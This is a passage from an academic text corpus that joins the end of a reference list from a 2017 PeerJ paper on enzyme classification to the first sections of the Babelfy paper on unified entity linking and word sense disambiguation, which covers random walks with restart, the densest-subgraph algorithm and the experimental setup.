32(21):6437–6444 DOI 10.1093/nar/gkh984. Huang W-L, Chen H-M, Hwang S-F, Ho S-Y. 2007. Accurate prediction of enzyme subfamily class using an adaptive fuzzy k-nearest neighbor method. Biosystems 90(2):405–413 DOI 10.1016/j.biosystems.2006.10.004. Illergård K, Ardell DH, Elofsson A. 2009. Structure is three to ten times more conserved than sequencea study of structural response in protein cores. Proteins: Structure, Function, and Bioinformatics 77(3):499–508 DOI 10.1002/prot.22458. Krizhevsky A, Sutskever I, Hinton GE. 2012. Imagenet classification with deep con- volutional neural networks. In: Advances in Neural Information Processing Systems. 1097–1105. Kumar C, Choudhary A. 2012. A top-down approach to classify enzyme functional classes and sub-classes using random forest. EURASIP Journal on Bioinformatics and Systems Biology 2012(1):1–14 DOI 10.1186/1687-4153-2012-1. Lee BJ, Shin MS, Oh YJ, Oh HS, Ryu KH. 2009. Identification of protein functions using a machine-learning approach based on sequence-derived properties. Proteome Science 7:1 DOI 10.1186/1477-5956-7-1. Li Y, Shibuya T. 2015. Malphite: a convolutional neural network and ensemble learning based protein secondary structure predictor. In: IEEE International conference on bioinformatics and biomedicine (BIBM). Piscataway: IEEE, 1260–1266. Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 15/17 https://peerj.com http://dx.doi.org/10.1371/journal.pone.0055484 http://dx.doi.org/10.1093/nar/gkg600 http://dx.doi.org/10.1145/1961189.1961199 http://dx.doi.org/10.1016/j.jtbi.2006.06.025 http://dx.doi.org/10.1002/1097-0134(20001001)41:1<98::AID-PROT120>3.0.CO;2-S http://dx.doi.org/10.1016/j.jmb.2004.10.024 http://dx.doi.org/10.1016/j.sbi.2011.03.010 http://dx.doi.org/10.1093/nar/gkh984 http://dx.doi.org/10.1016/j.biosystems.2006.10.004 http://dx.doi.org/10.1002/prot.22458 http://dx.doi.org/10.1186/1687-4153-2012-1 http://dx.doi.org/10.1186/1477-5956-7-1 http://dx.doi.org/10.7717/peerj-cs.124 Lin Z, Lanchantin J, Qi Y. 2016. MUST-CNN: a multilayer shift-and-stitch deep convolutional architecture for sequence-based protein structure prediction. In: 30th AAAI conference on artificial intelligence. Menlo Park: AAAI. Lu L, Qian Z, Cai Y-D, Li Y. 2007. ECS: an automatic enzyme classifier based on func- tional domain composition. Computational Biology and Chemistry 31(3):226–232 DOI 10.1016/j.compbiolchem.2007.03.008. Nagao C, Nagano N, Mizuguchi K. 2014. Prediction of detailed enzyme functions and identification of specificity determining residues by random forests. PLOS ONE 9(1):1–12 DOI 10.1371/journal.pone.0084623. Nasibov E, Kandemir-Cavas C. 2009. Efficiency analysis of KNN and minimum distance-based classifiers in enzyme family prediction. Computational Biology and Chemistry 33(6):461–464 DOI 10.1016/j.compbiolchem.2009.09.002. Qiu J-D, Huang J-H, Shi S-P, Liang R-P. 2010. Using the concept of Chou’s pseudo amino acid composition to predict enzyme family classes: an approach with support vector machine based on discrete wavelet transform. Protein and Peptide Letters 17(6):715–722 DOI 10.2174/092986610791190372. Sharma M, Garg P. 2014. Computational approaches for enzyme functional class prediction: a review. Current Proteomics 11(1):17–22 DOI 10.2174/1570164611666140415225013. Shen H-B, Chou K-C. 2007. EzyPred: a top–down approach for predicting enzyme func- tional classes and subclasses. Biochemical and Biophysical Research Communications 364(1):53–59 DOI 10.1016/j.bbrc.2007.09.098. Spencer M, Eickholt J, Cheng J. 2015. A deep learning network approach to ab initio protein secondary structure prediction. IEEE/ACM transactions on computational biology and bioinformatics (TCBB) 12(1):103–112 DOI 10.1109/TCBB.2014.2343960. Todd AE, Orengo CA, Thornton JM. 2001. Evolution of function in protein superfam- ilies, from a structural perspective. Journal of Molecular Biology 307(4):1113–1143 DOI 10.1006/jmbi.2001.4513. Vedaldi A, Lenc K. 2015. Matconvnet: convolutional neural networks for MATLAB. In: Proceedings of the 23rd ACM international conference on multimedia. New York: ACM, 689–692. Volpato V, Adelfio A, Pollastri G. 2013. Accurate prediction of protein enzymatic class by n-to-1 neural networks. BMC Bioinformatics 14(1):1 DOI 10.1186/1471-2105-14-1. Wang G, Dunbrack RL. 2003. PISCES: a protein sequence culling server. Bioinformatics 19(12):1589–1591 DOI 10.1093/bioinformatics/btg224. Wang Y-C, Wang X-B, Yang Z-X, Deng N-Y. 2010. Prediction of enzyme subfamily class via pseudo amino acid composition by incorporating the conjoint triad feature. Protein and Peptide Letters 17(11):1441–1449 DOI 10.2174/0929866511009011441. Wang Y-C, Wang Y, Yang Z-X, Deng N-Y. 2011. Support vector machine prediction of enzyme function with conjoint triad feature and hierarchical context. BMC Systems Biology 5(1):1 DOI 10.1186/1752-0509-5-1. Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 16/17 https://peerj.com http://dx.doi.org/10.1016/j.compbiolchem.2007.03.008 http://dx.doi.org/10.1371/journal.pone.0084623 http://dx.doi.org/10.1016/j.compbiolchem.2009.09.002 http://dx.doi.org/10.2174/092986610791190372 http://dx.doi.org/10.2174/1570164611666140415225013 http://dx.doi.org/10.1016/j.bbrc.2007.09.098 http://dx.doi.org/10.1109/TCBB.2014.2343960 http://dx.doi.org/10.1006/jmbi.2001.4513 http://dx.doi.org/10.1186/1471-2105-14-1 http://dx.doi.org/10.1093/bioinformatics/btg224 http://dx.doi.org/10.2174/0929866511009011441 http://dx.doi.org/10.1186/1752-0509-5-1 http://dx.doi.org/10.7717/peerj-cs.124 Webb EC. 1992. Enzyme nomenclature 1992. In: Recommendations of the nomenclature committee of the international union of biochemistry and molecular biology on the nomenclature and classification of enzymes. San Diego: Academic Press. Yadav SK, Tiwari AK. 2015. Classification of enzymes using machine learning based approaches: a review. Machine Learning and Applications 2(3/4):30–49. Zhou X-B, Chen C, Li Z-C, Zou X-Y. 2007. Using Chou’s amphiphilic pseudo-amino acid composition and support vector machine for prediction of enzyme subfamily classes. Journal of Theoretical Biology 248(3):546–551 DOI 10.1016/j.jtbi.2007.06.001. Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 17/17 https://peerj.com http://dx.doi.org/10.1016/j.jtbi.2007.06.001 http://dx.doi.org/10.7717/peerj-cs.124 work_7dbhbon7qnde7pnrlnuwtsy5mu ---- Entity Linking meets Word Sense Disambiguation: a Unified Approach Entity Linking meets Word Sense Disambiguation: a Unified Approach Andrea Moro, Alessandro Raganato, Roberto Navigli Dipartimento di Informatica, Sapienza Università di Roma, Viale Regina Elena 295, 00161 Roma, Italy {moro,navigli}@di.uniroma1.it ale.raganato@gmail.com Abstract Entity Linking (EL) and Word Sense Disam- biguation (WSD) both address the lexical am- biguity of language. But while the two tasks are pretty similar, they differ in a fundamen- tal respect: in EL the textual mention can be linked to a named entity which may or may not contain the exact mention, while in WSD there is a perfect match between the word form (bet- ter, its lemma) and a suitable word sense. In this paper we present Babelfy, a unified graph-based approach to EL and WSD based on a loose identification of candidate mean- ings coupled with a densest subgraph heuris- tic which selects high-coherence semantic in- terpretations. Our experiments show state-of- the-art performances on both tasks on 6 differ- ent datasets, including a multilingual setting. Babelfy is online at http://babelfy.org 1 Introduction The automatic understanding of the meaning of text has been a major goal of research in computational linguistics and related areas for several decades, with ambitious challenges, such as Machine Read- ing (Etzioni et al., 2006) and the quest for knowl- edge (Schubert, 2006). Word Sense Disambiguation (WSD) (Navigli, 2009; Navigli, 2012) is a historical task aimed at assigning meanings to single-word and multi-word occurrences within text, a task which is more alive than ever in the research community. Recently, the collaborative creation of large semi- structured resources, such as Wikipedia, and knowl- edge resources built from them (Hovy et al., 2013), such as BabelNet (Navigli and Ponzetto, 2012a), DBpedia (Auer et al., 2007) and YAGO2 (Hoffart et al., 2013), has favoured the emergence of new tasks, such as Entity Linking (EL) (Rao et al., 2013), and opened up new possibilities for tasks such as Named Entity Disambiguation (NED) and Wikifi- cation. The aim of EL is to discover mentions of entities within a text and to link them to the most suitable entry in a reference knowledge base. How- ever, in contrast to WSD, a mention may be partial while still being unambiguous thanks to the context. For instance, consider the following sentence: (1) Thomas and Mario are strikers playing in Munich. This example makes it clear how intertwined the two tasks of WSD and EL are. In fact, on the one hand, striker and play are polysemous words which can be disambiguated by selecting the game/soccer playing senses of the two words in a dictionary; on the other hand, Thomas and Mario are partial men- tions which have to be linked to the appropriate en- tries of a knowledge base, that is, Thomas Müller and Mario Gomez, two well-known soccer players. The two main differences between WSD and EL lie, on the one hand, in the kind of inventory used, i.e., dictionary vs. encyclopedia, and, on the other hand, in the assumption that the mention is complete or potentially partial. Notwithstanding these differ- ences, the tasks are similar in nature, in that they both involve the disambiguation of textual fragments according to a reference inventory. However, the re- search community has so far tackled the two tasks separately, often duplicating efforts and solutions. In contrast to this trend, research in knowledge acquisition is now heading towards the seamless in- 231 Transactions of the Association for Computational Linguistics, 2 (2014) 231–244. Action Editor: Noah Smith. Submitted 9/2013; Revised 1/2014; Published 5/2014. c©2014 Association for Computational Linguistics. tegration of encyclopedic and lexicographic knowl- edge into structured language resources (Hovy et al., 2013), and the main representative of this new direc- tion is undoubtedly BabelNet (Navigli and Ponzetto, 2012a). Given such structured language resources it seems natural to suppose that they might provide a common ground for the two tasks of WSD and EL. More precisely, in this paper we explore the hy- pothesis that the lexicographic knowledge used in WSD is also useful for tackling the EL task, and, vice versa, that the encyclopedic information uti- lized in EL helps disambiguate nominal mentions in a WSD setting. We propose Babelfy, a novel, uni- fied graph-based approach to WSD and EL, which performs two main steps: i) it exploits random walks with restart, and triangles as a support for reweight- ing the edges of a large semantic network; ii) it uses a densest subgraph heuristic on the available seman- tic interpretations of the input text to perform a joint disambiguation with both concepts and named enti- ties. Our experiments show the benefits of our syn- ergistic approach on six gold-standard datasets. 2 Related Work 2.1 Word Sense Disambiguation Word Sense Disambiguation (WSD) is the task of choosing the right sense for a word within a given context. Typical approaches for this task can be clas- sified as i) supervised, ii) knowledge-based, and iii) unsupervised. However, supervised approaches re- quire huge amounts of annotated data (Zhong and Ng, 2010; Shen et al., 2013; Pilehvar and Navigli, 2014), an effort which cannot easily be repeated for new domains and languages, while unsupervised ones suffer from data sparsity and an intrinsic diffi- culty in their evaluation (Agirre et al., 2006; Brody and Lapata, 2009; Manandhar et al., 2010; Van de Cruys and Apidianaki, 2011; Di Marco and Nav- igli, 2013). On the other hand, knowledge-based approaches are able to obtain good performance us- ing readily-available structured knowledge (Agirre et al., 2010; Guo and Diab, 2010; Ponzetto and Nav- igli, 2010; Miller et al., 2012; Agirre et al., 2014). Some of these approaches marginally take into ac- count the structural properties of the knowledge base (Mihalcea, 2005). Other approaches, instead, lever- age the structural properties of the knowledge base by exploiting centrality and connectivity measures (Sinha and Mihalcea, 2007; Tsatsaronis et al., 2007; Agirre and Soroa, 2009; Navigli and Lapata, 2010). One of the key steps of many knowledge-based WSD algorithms is the creation of a graph repre- senting the semantic interpretations of the input text. Two main strategies to build this graph have been proposed: i) exploiting the direct connections, i.e., edges, between the considered sense candidates; ii) populating the graph according to (shortest) paths between them. In our approach we manage to unify these two strategies by automatically creating edges between sense candidates performing Random Walk with Restart (Tong et al., 2006). The recent upsurge of interest in multilinguality has led to the development of cross-lingual and mul- tilingual approaches to WSD (Lefever and Hoste, 2010; Lefever and Hoste, 2013; Navigli et al., 2013). Multilinguality has been exploited in different ways, e.g., by using parallel corpora to build multilingual contexts (Guo and Diab, 2010; Banea and Mihalcea, 2011; Lefever et al., 2011) or by means of ensemble methods which exploit complementary sense evi- dence from translations in different languages (Nav- igli and Ponzetto, 2012b). In this work, we present a novel exploitation of the structural properties of a multilingual semantic network. 2.2 Entity Linking Entity Linking (Erbs et al., 2011; Rao et al., 2013; Cornolti et al., 2013) encompasses a set of similar tasks, which include Named Entity Disambiguation (NED), that is the task of linking entity mentions in a text to a knowledge base (Bunescu and Pasca, 2006; Cucerzan, 2007), and Wikification, i.e., the automatic annotation of text by linking its relevant fragments of text to the appropriate Wikipedia arti- cles. Mihalcea and Csomai (2007) were the first to tackle the Wikification task. In their approach they disambiguate each word in a sentence independently by exploiting the context in which it occurs. How- ever, this approach is local in that it lacks a collective notion of coherence between the selected Wikipedia pages. To overcome this problem, Cucerzan (2007) introduced a global approach based on the simulta- neous disambiguation of all the terms in a text and the use of lexical context to disambiguate the men- tions. To maximize the semantic agreement Milne 232 and Witten (2008) introduced the analysis of the se- mantic relations between the candidate senses and the unambiguous context, i.e., words with a single sense candidate. However, the performance of this algorithm depends heavily on the number of links incident to the target senses and on the availabil- ity of unambiguous words within the input text. To overcome this issue a novel class of approaches have been proposed (Kulkarni et al., 2009; Ratinov et al., 2011; Hoffart et al., 2011) that exploit global and local features. However, these systems either rely on a difficult NP-hard formalization of the problem which is infeasible for long text, or exploit popular- ity measures which are domain-dependent. In con- trast, we show that the semantic network structure can be leveraged to obtain state-of-the-art perfor- mance by synergistically disambiguating both word senses and named entities at the same time. Recently, the explosion of on-line social network- ing services, such as Twitter and Facebook, have contributed to the development of new methods for the efficient disambiguation of short texts (Ferrag- ina and Scaiella, 2010; Hoffart et al., 2012; Böhm et al., 2012). Thanks to a loose candidate identification technique coupled with a densest subgraph heuristic, we show that our approach is particularly suited for short and highly ambiguous text disambiguation. 2.3 The Best of Two Worlds Our main goal is to bring together the two worlds of WSD and EL. On the one hand, this implies relaxing the constraint of a perfect association between men- tions and meanings, which is, instead, assumed in WSD. On the other hand, this relaxation leads to the inherent difficulty of encoding a full-fledged sense inventory for EL. Our solution to this problem is to keep the set of candidate meanings for a given men- tion as open as possible (see Section 6), so as to en- able high recall in linking partial mentions, while providing an effective method for handling this high ambiguity (see Section 7). A key assumption of our work is that the lexico- graphic knowledge used in WSD is also useful for tackling the EL task, and vice versa the encyclopedic information utilized in EL helps disambiguate nom- inal mentions in a WSD setting. We enable the joint treatment of concepts and named entities by enforc- ing high coherence in our semantic interpretations. 3 WSD and Entity Linking Together Task. Our task is to disambiguate and link all nominal and named entity mentions occurring within a text. The linking task is performed by asso- ciating each mention with the most suitable entry of a given knowledge base.1 We point out that our definition is unconstrained in terms of what to link, i.e., unlike Wikification and WSD, we can link overlapping fragments of text. For instance, given the text fragment Major League Soccer, we identify and disambiguate several dif- ferent nominal and entity mentions: Major League Soccer, major league, league and soccer. In contrast to EL, we link not only named entity mentions, such as Major League Soccer, but also nominal mentions, e.g., major league, to their corresponding meanings in the knowledge base. Babelfy. We provide a unified approach to WSD and entity linking in three steps: 1. Given a lexicalized semantic network, we as- sociate with each vertex, i.e., either concept or named entity, a semantic signature, that is, a set of related vertices (Section 5). This is a prelim- inary step which needs to be performed only once, independently of the input text. 2. Given a text, we extract all the linkable frag- ments from this text and, for each of them, list the possible meanings according to the seman- tic network (Section 6). 3. We create a graph-based semantic interpreta- tion of the whole text by linking the candidate meanings of the extracted fragments using the previously-computed semantic signatures. We then extract a dense subgraph of this represen- tation and select the best candidate meaning for each fragment (Section 7). 4 Semantic Network Our approach requires the availability of a wide- coverage semantic network which encodes struc- tural and lexical information both of an encyclope- dic and of a lexicographic kind. Although in prin- ciple any semantic network with these properties 1Mentions which are not contained in the reference knowl- edge base are not taken into account. 233 could be utilized, in our work we used the Babel- Net2 1.1.1 semantic network (Navigli and Ponzetto, 2012a) since it is the largest multilingual knowl- edge base, obtained from the automatic seamless integration of Wikipedia3 and WordNet (Fellbaum, 1998). We consider BabelNet as a directed multi- graph which contains both concepts and named en- tities as its vertices and a multiset of semantic rela- tions as its edges. We leverage the multilingual lex- icalizations of the vertices of BabelNet to identify mentions in the input text. For example, the entity FC Bayern Munich can be lexicalized in different languages, e.g., F.C. Bayern de Múnich in Spanish, Die Roten in English and Bayern München in Ger- man, among others. As regards semantic relations, the only information we use is that of the end points, i.e., vertices, that these relations connect, while ne- glecting the relation type. 5 Building Semantic Signatures One of the major issues affecting both manually- curated and automatically constructed semantic net- works is data sparsity. For instance, we calculated that the average number of incident edges is roughly 10 in WordNet, 50 in BabelNet and 80 in YAGO2, to mention a few. Although automatically-built re- sources typically provide larger amounts of edges, two issues have to be taken into account: concepts which should be related might not be directly con- nected despite being structurally close within the network, and, vice versa, weakly-related or even un- related concepts can be erroneously connected by an edge. For instance, in BabelNet we do not have an edge between playmaker and Thomas Müller, while we have an incorrect edge connecting FC Bayern Munich and Yellow Submarine (song). However, this crisp notion of relatedness can be overcome by exploiting the global structure of the semantic net- work, thereby obtaining a more precise and higher- coverage measure of relatedness. We address this issue in two steps: first, we provide a structural weighting of the network’s edges; second, for each vertex we create a set of related vertices using ran- dom walks with restart. 2http://babelnet.org 3http://www.wikipedia.org Structural weighting. Our first objective is to as- sign higher weights to edges which are involved in more densely connected areas of the directed net- work. To this end, inspired by the local cluster- ing coefficient measure (Watts and Strogatz, 1998) and its recent success in Word Sense Induction (Di Marco and Navigli, 2013), we use directed tri- angles, i.e., directed cycles of length 3, and weight each edge (v,v′) by the number of directed triangles it occurs in: weight(v,v′) := |{(v,v′,v′′) : (v,v′), (1) (v′,v′′),(v′′,v) ∈ E}|+ 1 We add one to each weight to ensure the highest de- gree of reachability in the network. Random Walk with Restart. Our goal is to cre- ate a semantic signature (i.e., a set of highly related vertices) for each concept and named entity of the semantic network. To do this, we perform a Random Walk with Restart (RWR) (Tong et al., 2006), that is, a stochastic process that starts from an initial vertex of the graph4 and then, for a fixed number n of steps or until convergence, explores the graph by choos- ing the next vertex within the current neighborhood or by restarting from the initial vertex with a given, fixed restart probability α. For each edge (v,v′) in the network, we model the conditional probability P(v′|v) as the normalized weight of the edge: P(v′|v) = weight(v,v ′)∑ v′′∈V weight(v,v ′′) where V is the set of vertices of the semantic net- work and weight(v,v′) is the function defined in Equation 1. We then run the RWR from each ver- tex v of the semantic network for a fixed number n of steps (we show in Algorithm 1 our RWR pseu- docode). We keep track of the encountered ver- tices using the map counts, i.e., we increase the counter associated with vertex v′ in counts every time we hit v′ during a RWR started from v (see line 11). As a result, we obtain a frequency distri- bution over the whole set of concepts and entities. To eliminate weakly-related vertices we keep only those items that were hit at least η times (see lines 16–18). Finally, we save the remaining vertices in the set semSignv which is the semantic signature of v (see line 19). 4RWR can be used with an initial set of vertices, however in this paper we use a single initial vertex. 234 Algorithm 1 Random walk with restart. 1: input: v, the starting vertex; α, the restart probability; n, the number of steps to be executed; P , the transition probabilities; η, the frequency threshold. 2: output: semSignv, set of related vertices for v. 3: function RWR(v,α,n,P,η) 4: v′ := v 5: counts := new Map < Synset,Integer > 6: while n > 0 do 7: if random() > α then 8: given the transition probabilities P(·|v′) 9: of v′, choose a random neighbor v′′ 10: v′ := v′′ 11: counts[v′] + + 12: else 13: restart the walk 14: v′ := v 15: n := n−1 16: for each v′ in counts.keys() do 17: if counts[v′] < η then 18: remove v′ from counts.keys() 19: return semSignv = counts.keys() The creation of our set of semantic signatures, one for each vertex in the semantic network, is a prelim- inary step carried out once only before starting pro- cessing any input text. We now turn to the candidate identification and disambiguation steps. 6 Candidate Identification Given a text as input, we apply part-of-speech tag- ging and identify the set F of all the textual frag- ments, i.e., all the sequences of words of maximum length five, which contain at least one noun and that are substrings of lexicalizations in BabelNet, i.e., those fragments that can potentially be linked to an entry in BabelNet. For each textual fragment f ∈ F , i.e., a single- or multi-word expression of the input text, we look up the semantic network for candidate meanings, i.e., vertices that contain f or, only for named entities, a superstring of f as their lexical- ization. For instance, for sentence (1) in the intro- duction, we identify the following textual fragments: Thomas, Mario, strikers, Munich. This output is ob- tained thanks to our loose candidate identification routine, i.e., based on superstring matching instead of exact matching, which, for instance, enables us to recognize the right candidate Mario Gomez for the mention Mario even if this named entity does not have Mario as one of its lexicalizations (for an anal- ysis of the impact of this routine against the exact matching approach see the discussion in Section 9). Moreover, as we stated in Section 3, we allow overlapping fragments, e.g., for major league we recognize league and major league. We denote with cand(f) the set of all the candidate meanings of fragment f. For instance, for the noun league we have that cand(league) contains among others the sport word sense and the TV series named entity. 7 Candidate Disambiguation Semantic interpretation graph. After the identi- fication of fragments (F ) and their candidate mean- ings (cand(·)), we create a directed graph GI = (VI,EI) of the semantic interpretations of the input text. We show the pseudocode in Algorithm 2. VI contains all the candidate meanings of all fragments, that is, VI := {(v,f) : v ∈ cand(f),f ∈ F}, where f is a fragment of the input text and v is a candidate Babel synset that has a lexicalization which is equal to or is a superstring of f (see lines 4–8). The set of edges EI connects related meanings and is pop- ulated as follows: we add an edge from (v,f) to (v′,f ′) if and only if f 6= f ′ and v′ ∈ semSignv (see lines 9–11). In other words, we connect two candidate meanings of different fragments if one is in the semantic signature of the other. For instance, we add an edge between (Mario Gomez, Mario) and (Thomas Müller, Thomas), while we do not add one between (Mario Gomez, Mario) and (Mario Basler, Mario) since these are two candidate meanings of the same fragment, i.e., Mario. In Figure 1, we show an excerpt of our graph for sentence (1). At this point we have a graph-based representa- tion of all the possible interpretations of the input text. In order to drastically reduce the degree of am- biguity while keeping the interpretation coherence as high as possible, we apply a novel densest sub- graph heuristic (see line 12), whose description we defer to the next paragraph. The result is a sub- graph which contains those semantic interpretations that are most coherent to each other. However, this subgraph might still contain multiple interpretations for the same fragment, and even unambiguous frag- ments which are not correct. Therefore, the final 235 (Tomás Milián, Thomas) (Thomas Müller, Thomas) (forward, striker) (striker, striker) (FC Bayern Munich, Munich) (Munich, Munich) (Mario Adorf, Mario) (Mario Basler, Mario) (Mario Gomez, Mario) Figure 1: An excerpt of the semantic interpretation graph automatically built for the sentence Thomas and Mario are strikers playing in Munich (the edges connecting the correct meanings are in bold). step is the selection of the most suitable candidate meaning for each fragment f given a threshold θ to discard semantically unrelated candidate meanings. We score each meaning v ∈ cand(f) with its nor- malized weighted degree5 in the densest subgraph: score((v,f)) = w(v,f) ·deg((v,f))∑ v′ ∈ cand(f) w(v′,f) ·deg((v′,f)) (2) where w(v,f) is the fraction of fragments the candi- date meaning v connects to: w(v,f) := |{f′ ∈ F : ∃v′ s.t. ((v,f),(v′,f′)) or ((v′,f′),(v,f)) ∈ EI}| |F |−1 The rationale behind this scoring function is to take into account both the semantic coherence, us- ing a graph centrality measure among the candidate meanings, and the lexical coherence, in terms of the number of fragments a candidate relates to. Finally, we link each f to the highest ranking can- didate meaning v? if score((v?,f)) ≥ θ, where θ is a fixed threshold (see lines 14–18 of Algorithm 2). For instance, in sentence (1) and for the fragment Mario we select Mario Gomez as our final candidate meaning and link it to the fragment. Linking by densest subgraph. We now illustrate our novel densest subgraph heuristic, used in line 12 of Algorithm 2, for reducing the level of ambiguity of the initial semantic interpretation graph GI . The main idea here is that the most suitable meanings of each text fragment will belong to the densest area of the graph. For instance, in Figure 1 the (candidate, fragment) pairs (Thomas Müller, Thomas), (Mario Gomez, Mario), (striker, striker) and (FC Bayern 5We denote with deg(v) the overall number of incoming and outgoing edges, i.e., deg(v) := deg+(v) + deg−(v). Algorithm 2 Candidate Disambiguation. 1: input: F , the fragments in the input text; semSign, the semantic signatures; µ, ambiguity level to be reached; cand, fragments to candidate meanings. 2: output: selected, disambiguated fragments. 3: function DISAMB(F,semSign,µ,cand) 4: VI := ∅;EI := ∅ 5: GI := (VI,EI) 6: for each fragment f ∈ F do 7: for each candidate v ∈ cand(f) do 8: VI := VI ∪{(v,f)} 9: for each ((v,f),(v′,f′)) ∈ VI ×VI do 10: if f 6= f′ and v′ ∈ semSignv then 11: EI := EI ∪{((v,f),(v′,f′))} 12: G?I := DENSSUB(F,cand,GI,µ) 13: selected := new Map < String,Synset > 14: for each f ∈ F s.t. ∃(v,f) ∈ V ?I do 15: cand?(f) := {v : (v,f) ∈ V ?I } 16: v? := arg maxv∈cand?(f) score((v,f)) 17: if score((v?,f)) ≥ θ then 18: selected(f) := v? 19: return selected Munich, Munich) form a dense subgraph supporting their relevance for sentence (1). The problem of identifying the densest subgraph of size at least k is NP-hard (Feige et al., 1999). Therefore, we define a heuristic for k-partite graphs inspired by a 2-approximation greedy algorithm for arbitrary graphs (Charikar, 2000; Khuller and Saha, 2009). Our adapted strategy for selecting a dense subgraph of GI is based on the iterative removal of low-coherence vertices, i.e., fragment interpreta- tions. We show the pseudocode in Algorithm 3. We start with the initial graph G(0)I at step t = 0 (see line 5). For each step t (lines 7–16), first, we identify the most ambiguous fragment fmax, i.e., the one with the maximum number of candidate mean- 236 Algorithm 3 Densest Subgraph. 1: input: F , the set of all fragments in the input text; cand, from fragments to candidate meanings; G (0) I , the full semantic interpretation graph; µ, ambiguity level to be reached. 2: output: G?I , a dense subgraph. 3: function DENSSUB(F,cand,G(0)I ,µ) 4: t := 0 5: G?I := G (0) I 6: while true do 7: fmax := arg maxf∈F |{v : ∃(v,f) ∈ V (t) I }| 8: if |{v : ∃(v,fmax) ∈ V (t)I }|≤ µ then 9: break; 10: vmin:= argmin v ∈ cand(fmax) score((v,fmax)) 11: V (t+1) I := V (t) I \{(vmin,fmax)} 12: E (t+1) I := E (t) I ∩V (t+1) I ×V (t+1) I 13: G (t+1) I := (V (t+1) I ,E (t+1) I ) 14: if avgdeg(G(t+1)I ) > avgdeg(G ? I) then 15: G?I := G (t+1) I 16: t := t + 1 17: return G?I ings in the graph (see line 7). Next, we discard the weakest interpretation of the current fragment fmax. To do so, we determine the lexical and seman- tic coherence of each candidate meaning (v,fmax) using Formula 2 (see line 10). We then remove from our graph G(t)I the lowest-coherence vertex (vmin,fmax), i.e., the one whose score is minimum (see lines 11–13). For instance, in Figure 1, fmax is the fragment Mario and we have: score((Mario Gomez, Mario)) ∝ 3 3 · 5 = 5, score((Mario Basler, Mario)) ∝ 1 3 · 1 = 0.3 and score((Mario Adorf, Mario)) ∝ 2 3 ·2 = 1.3, so we remove (Mario Basler, Mario) from the graph since its score is minimum. We then move to the next step, i.e., we set t := t + 1 (see line 16) and repeat the low-coherence re- moval step. We stop when the number of remaining candidates for each fragment is below a threshold µ, i.e., |{v : ∃(v,f) ∈ V (t)I }| ≤ µ ∀f ∈ F (see lines 8–9). During each iteration step t we com- pute the average degree of the current graph G(t)I , i.e., avgdeg(G(t)I ) = 2|E(t) I | |V (t) I | . Finally, we select as the densest subgraph of the initial semantic interpre- tation graph GI the graph G?I that maximizes the av- erage degree (see lines 14–15). 8 Experimental Setup Datasets. We carried out our experiments on six datasets, four for WSD and two for EL: • The SemEval-2013 task 12 dataset for multilin- gual WSD (Navigli et al., 2013), which consists of 13 documents in different domains, available in 5 languages. For each language, all noun occurrences were annotated using BabelNet, thereby providing Wikipedia and WordNet an- notations wherever applicable. The number of mentions to be disambiguated roughly ranges from 1K to 2K per language in the different se- tups. • The SemEval-2007 task 7 dataset for coarse- grained English all-words WSD (Navigli et al., 2007). We take into account only nominal men- tions obtaining a dataset containing 1107 nouns to be disambiguated using WordNet. • The SemEval-2007 task 17 dataset for fine- grained English all-words WSD (Pradhan et al., 2007). We considered only nominal mentions resulting in 158 nouns annotated with WordNet synsets. • The Senseval-3 dataset for English all-words WSD (Snyder and Palmer, 2004), which con- tains 899 nouns to be disambiguated using WordNet. • KORE50 (Hoffart et al., 2012), which consists of 50 short English sentences (mean length of 14 words) with a total number of 144 mentions manually annotated using YAGO2, for which a Wikipedia mapping is available. This dataset was built with the idea of testing against a high level of ambiguity for the EL task. • AIDA-CoNLL6 (Hoffart et al., 2011), which consists of 1392 English articles, for a total of roughly 35K named entity mentions anno- tated with YAGO concepts separated in devel- opment, training and test sets. We exploited the POS tags already available in the SemEval and Senseval datasets, while we used the Stanford POS tagger (Toutanova et al., 2003) for the English sentences in the last two datasets. 6We used AIDA-CoNLL as it is the most recent and largest available dataset for EL (Hachey et al., 2013). The TAC KBP datasets are available only to participants. 237 Parameters. We fixed the parameters of RWR (Section 5) to the values α = .85, η = 100 and n = 1M which maximize F1 on a manually cre- ated tuning set made up of 10 gold-standard seman- tic signatures. We tuned our two disambiguation pa- rameters µ = 10 and θ = 0.8 by optimizing F1 on the trial dataset of the SemEval-2013 task on mul- tilingual WSD (Navigli et al., 2013). We used the same parameters on all the other WSD datasets. As for EL, we used the training part of AIDA-CoNLL (Hoffart et al., 2011) to set µ = 5 and θ = 0.0. 8.1 Systems Multilingual WSD. We evaluated our system on the SemEval-2013 task 12 by comparing it with the participating systems: • UMCC-DLSI (Gutiérrez et al., 2013) a state- of-the-art Personalized PageRank-based ap- proach that exploits the integration of different sources of knowledge, such as WordNet Do- mains/Affect (Strapparava and Valitutti, 2004), SUMO (Zouaq et al., 2009) and the eXtended WordNet (Mihalcea and Moldovan, 2001); • DAEBAK! (Manion and Sainudiin, 2013) which performs WSD on the basis of periph- eral diversity within subgraphs of BabelNet; • GETALP (Schwab et al., 2013) which uses an Ant Colony Optimization technique together with the classical measure of Lesk (1986). We also compared with UKB w2w (Agirre and Soroa, 2009), a state-of-the-art approach for knowledge-based WSD, based on Personalized PageRank (Haveliwala, 2002). We used the same mapping from words to senses that we used in our approach, default parameters7 and BabelNet as the input graph. Moreover, we compared our system with IMS (Zhong and Ng, 2010), a state-of-the- art supervised English WSD system which uses an SVM trained on sense-annotated corpora, such as SemCor (Miller et al., 1993) and DSO (Ng and Lee, 1996), among others. We used the IMS model out-of-the-box with Most Frequent Sense (MFS) as backoff routine since the model obtained using the task trial data performed worse. We followed the original task formulation and evaluated the synsets in three different settings, i.e., 7./ukb wsd -D dict.txt -K kb.bin --ppr w2w ctx.txt when using BabelNet senses, Wikipedia senses and WordNet senses, thanks to BabelNet being a super- set of the other two inventories. We ran our sys- tem on a document-by-document basis, i.e., disam- biguating each document at once, so as to test its effectiveness on long coherent texts. Performance was calculated in terms of F1 score. We also com- pared the systems with the MFS baseline computed for the three inventories (Navigli et al., 2013). Coarse-grained WSD. For the SemEval-2007 task 7 we compared our system with the two top- ranked approaches, i.e., NUS-PT (Chan et al., 2007) and UoR-SSI (Navigli, 2008), which respectively exploited parallel texts and enriched semantic paths in a semantic network, the previously described UKB w2w system,8 a knowledge-based WSD ap- proach (Ponzetto and Navigli, 2010) which exploits an automatic extension of WordNet, and, as base- line, the MFS. 